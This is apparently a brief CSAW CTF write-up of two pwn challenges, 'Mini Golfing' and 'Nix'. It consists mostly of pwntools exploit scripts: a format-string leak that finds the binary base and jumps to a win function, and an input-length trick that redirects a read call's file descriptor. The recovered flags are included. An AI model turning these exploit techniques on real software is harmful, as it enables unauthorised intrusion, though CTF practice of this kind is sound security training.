dplastico

Mini Golfing

Easy pwn:

#!/usr/bin/env python3

from pwn import *

elf = ELF("./golf_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
b main
continue
'''

# change -l0 to -l1 for more gadgets
def one_gadget(filename, base_addr=0):
	  return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)


def start():
    if args.REMOTE:
        return remote("golfing.ctf.csaw.io", 9999)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])


r = start()

def logbase(): log.info("libc base = %#x" % libc.address)
def logleak(name, val):  log.info(name+" = %#x" % val)
def sa(delim,data): return r.sendafter(delim,data)
def sla(delim,line): return r.sendlineafter(delim,line)
def sl(line): return r.sendline(line)
def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  # return data between d1 and d2
  if (d2):
    return r.recvuntil(d2,drop=True)

#========= exploit here ===================
payload = b"%p "* 340
sla(b"to enter your name?", payload)
leak = rcu(b" hello: ", b"\n").split(b" ")

leak = int(leak[170],16)
log.info(f" leak = {hex(leak)}")
base = leak-0x1223
log.info(f"base = {hex(base)}")
elf.address = base

log.info(f"win = {hex(elf.sym.win)} dec = {elf.sym.win}")

sla(b" to aim at!:", hex(elf.sym.win).encode('ascii'))
#========= interactive ====================
r.interactive()
#csawctf{I_doNT_want_t0_g0_901FING_AnymOrE_pl34S3_Thank_you_!!!}

Nix

This was a nice one. You can control the input size (depending on the character sent) and control the FD of a read call to make it read from stdin and pass the comparison.

#!/usr/bin/env python3

from pwn import *

elf = ELF("./chal_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
context.log_level = "debug"
gs = '''
b *main+462
continue
'''
def start():
    if args.REMOTE:
        return remote("nix.ctf.csaw.io", 1000)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def sa(delim,data): return r.sendafter(delim,data)
def sla(delim,line): return r.sendlineafter(delim,line)
def sl(line): return r.sendline(line)
def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  # return data between d1 and d2
  if (d2):
    return r.recvuntil(d2,drop=True)

#========= exploit here ===================

payload = b"\x01"* (0x800 -0x1bc)
sla(b"philosophies:",payload)
sleep(0.2)
sl(b"make every program a filter")

#========= interactive ====================
r.interactive()
#csawctf{-3v3ry7h1ng_15_4_f1l3}